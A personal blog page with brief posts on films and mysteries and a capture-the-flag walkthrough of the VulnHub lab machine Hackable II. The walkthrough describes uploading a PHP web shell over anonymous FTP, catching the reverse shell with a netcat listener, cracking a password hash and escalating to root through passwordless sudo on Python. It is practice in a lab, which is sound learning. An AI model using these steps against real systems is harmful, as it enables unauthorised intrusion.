Wednesday, December 22, 2021

Hackers (1995) - Honest Trailer

Honest Trailer for one of my favorite movies.
Posted by No comments:

Thursday, November 25, 2021

The Ghost in the Machine

A podcast on the Dodleston messages.
Posted by No comments:

Wednesday, November 24, 2021

Welcome to Racoon City

I just got back from seeing Resident Evil: Welcome to Racoon City, and all I've really got to say is wow! Loved every moment of it, and how much closer to the game franchise it is than the previous iteration of the movie franchise. Lovers of the movies might not care for it unless they also enjoyed the games. Lovers of the games will probably enjoy it more than the previous movies.
Posted by No comments:

Monday, November 22, 2021

The Circleville Letters Mystery

While looking up more information on The Dodleston Messages, I ran across this. How have I spend almost my entire life in small-town Ohio and never heard of The Circleville Letters before?
Posted by No comments:

The Dodleston Messages

I am subscribed to a number of retro-computer channels on Youtube, and one of them introduced me to The Dodleston Messages. Enjoy!
Posted by No comments:

Monday, November 1, 2021

Oddities in the Cassieverse

It has been brought to my attention, via the Discord server, that the first Cassie video no longer plays on cassieiswatching.com. It *used* to play from my website when it was running on my own server at home, and it played fine when I first moved it over to Blogger sometime in 2020-ish, but now it only plays from Youtube. This means that someone has logged into the PM's Youtube account to make this change within the last couple of years. This seems... interesting...
Posted by No comments:

Monday, July 26, 2021

CaptureTheFlag - Hackable II

I've recently regained interest in cyber security, so have been practicing on some of the CtF machines available on VulnHub. I started with some easy machines, as it's been quite some time since I've played with any of this, so after doing a couple, using walktroughs, I downloaded Hackable II and imported it into VirtualBox, and set the network up as "Internal" on the same network as my Kali VirtualBox. 

The first thing I did was run nmap to discover the IP of the new host:
sudo nmap 10.38.1.1/24
This revealed several servers running on the box:
Nmap scan report for 10.38.1.7
Host is up (0.00036s latency).
Not shown: 997 closed ports
PORT   STATE SERVICE
21/tcp open  ftp
22/tcp open  ssh
80/tcp open  http
MAC Address: 08:00:27:B5:56:29 (Oracle VirtualBox virtual NIC)

Hmmm... ftp, ssh, and a web server... The web server has the default apache2 site, which doesn't reveal anything too interesting... Apache2 Ubuntu Default Page... Nothing too extaordinary. So, back to nmap:

sudo nmap --script http-enum.nse 10.38.1.7

This revealed a folder named /files/ on the web server. So, I look at it in a web browser and see a file listing. So I attempt an anonymous ftp to the server, and, sure enough, it's the same folder listing. Could they have allowed anonymous uploads? I have a short text file, temp.txt, for just such tests...

put temp.txt

Success! And, if I refresh the web browser, the file shows up. So, I delete that file, and upload a php web shell, which points to my kali box:

put shell.php 

And on my kali box:

 nc -nlvp 1234

And then I refesh the page in Firefox and switch back to my netcat session and check to see what users are on this box...Interesting...

$ cd /home
$ ls -lta
total 16
drwxr-xr-x 4 shrek shrek 4096 Jul 26 21:13 shrek
drwxr-xr-x 23 root root 4096 Nov 26 2020 ..
drwxr-xr-x 3 root root 4096 Nov 26 2020 .
-rw-r--r-- 1 root root 43 Nov 26 2020 important.txt

 One user, shrek, and hmmm...

$ cat important.txt
run the script to see the data

/.runme.sh

Yeah... Not gonna run that... But...

$ cat /.runme.sh
!/bin/bash
echo 'the secret key'
sleep 2
echo 'is'
sleep 2
echo 'trolled'
sleep 2
echo 'restarting computer in 3 seconds...'
sleep 1
echo 'restarting computer in 2 seconds...'
sleep 1
echo 'restarting computer in 1 seconds...'
sleep 1
echo '⡴⠑⡄⠀⠀⠀⠀⠀⠀⠀ ⣀⣀⣤⣤⣤⣀⡀
⠸⡇⠀⠿⡀⠀⠀⠀⣀⡴⢿⣿⣿⣿⣿⣿⣿⣿⣷⣦⡀
⠀⠀⠀⠀⠑⢄⣠⠾⠁⣀⣄⡈⠙⣿⣿⣿⣿⣿⣿⣿⣿⣆
⠀⠀⠀⠀⢀⡀⠁⠀⠀⠈⠙⠛⠂⠈⣿⣿⣿⣿⣿⠿⡿⢿⣆
⠀⠀⠀⢀⡾⣁⣀⠀⠴⠂⠙⣗⡀⠀⢻⣿⣿⠭⢤⣴⣦⣤⣹⠀⠀⠀⢀⢴⣶⣆
⠀⠀⢀⣾⣿⣿⣿⣷⣮⣽⣾⣿⣥⣴⣿⣿⡿⢂⠔⢚⡿⢿⣿⣦⣴⣾⠸⣼⡿
⠀⢀⡞⠁⠙⠻⠿⠟⠉⠀⠛⢹⣿⣿⣿⣿⣿⣌⢤⣼⣿⣾⣿⡟⠉
⠀⣾⣷⣶⠇⠀⠀⣤⣄⣀⡀⠈⠻⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡇
⠀⠉⠈⠉⠀⠀⢦⡈⢻⣿⣿⣿⣶⣶⣶⣶⣤⣽⡹⣿⣿⣿⣿⡇
⠀⠀⠀⠀⠀⠀⠀⠉⠲⣽⡻⢿⣿⣿⣿⣿⣿⣿⣷⣜⣿⣿⣿⡇
⠀⠀ ⠀⠀⠀⠀⠀⢸⣿⣿⣷⣶⣮⣭⣽⣿⣿⣿⣿⣿⣿⣿⠇
⠀⠀⠀⠀⠀⠀⣀⣀⣈⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠇
⠀⠀⠀⠀⠀⠀⢿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿
shrek:cf4c2232354952690368f1b3dfdfb24d'

So, off to https://crackstation.net/ and the password for shrek is, apparently, onion. This was also the title of the file listing page in the web browser. Clever clue ;) So... Kill the reverse shell and login via ssh and see what we can do with sudo...

$ ssh shrek@10.38.1.7
shrek@10.38.1.7's password:
Welcome to Ubuntu 16.04.7 LTS (GNU/Linux 4.4.0-194-generic x86_64)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage


88 packages can be updated.
68 updates are security updates.


Last login: Mon Jul 26 21:09:32 2021 from 10.38.1.4
shrek@ubuntu:~$ sudo -l
Matching Defaults entries for shrek on ubuntu:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User shrek may run the following commands on ubuntu:
(root) NOPASSWD: /usr/bin/python3.5

Wait! What?! /usr/bin/python3.5 can be executed as root with no password?! Here's a quick and dirty sh.py: 

root@ubuntu:~# cd /root
root@ubuntu:/root# ls -lta
total 32
-rw-------  1 root root   13 Jun 15 16:01 .bash_history
drw-------  4 root root 4096 Jun 15 13:35 .
-rw-------  1 root root 1581 Jun 15 13:28 root.txt
drwxr-xr-x 23 root root 4096 Nov 26  2020 ..
drw-------  2 root root 4096 Nov 25  2020 .cache
drw-------  2 root root 4096 Nov 25  2020 .nano
-rw-------  1 root root 3106 Oct 22  2015 .bashrc
-rw-------  1 root root  148 Aug 17  2015 .profile
root@ubuntu:/root# cat root.txt
                            ____
        ____....----''''````    |.
,'''````            ____....----; '.
| __....----''''````         .-.`'. '.
|.-.                .....    | |   '. '.
`| |        ..:::::::::::::::| |   .-;. |
 | |`'-;-::::::::::::::::::::| |,,.| |-='
 | |   | ::::::::::::::::::::| |   | |
 | |   | :::::::::::::::;;;;;| |   | |
 | |   | :::::::::;;;2KY2KY2Y| |   | |
 | |   | :::::;;Y2KY2KY2KY2KY| |   | |
 | |   | :::;Y2Y2KY2KY2KY2KY2| |   | |
 | |   | :;Y2KY2KY2KY2KY2K+++| |   | |
 | |   | |;2KY2KY2KY2++++++++| |   | |
 | |   | | ;++++++++++++++++;| |   | |
 | |   | |  ;++++++++++++++;.| |   | |
 | |   | |   :++++++++++++:  | |   | |
 | |   | |    .:++++++++;.   | |   | |
 | |   | |       .:;+:..     | |   | |
 | |   | |         ;;        | |   | |
 | |   | |      .,:+;:,.     | |   | |
 | |   | |    .::::;+::::,   | |   | |
 | |   | |   ::::::;;::::::. | |   | |
 | |   | |  :::::::+;:::::::.| |   | |
 | |   | | ::::::::;;::::::::| |   | |
 | |   | |:::::::::+:::::::::| |   | |
 | |   | |:::::::::+:::::::::| |   | |
 | |   | ::::::::;+++;:::::::| |   | |
 | |   | :::::::;+++++;::::::| |   | |
 | |   | ::::::;+++++++;:::::| |   | |
 | |   |.:::::;+++++++++;::::| |   | |
 | | ,`':::::;+++++++++++;:::| |'"-| |-..
 | |'   ::::;+++++++++++++;::| |   '-' ,|
 | |    ::::;++++++++++++++;:| |     .' |
,;-'_   `-._===++++++++++_.-'| |   .'  .'
|    ````'''----....___-'    '-' .'  .'
'---....____           ````'''--;  ,'
            ````''''----....____|.'

invite-me: https://www.linkedin.com/in/eliastouguinho/

And there it is! It took me longer to write this up than to get the root flag on this box. Next time, maybe something a little harder? ;)

Posted by No comments:
Subscribe to: Posts (Atom)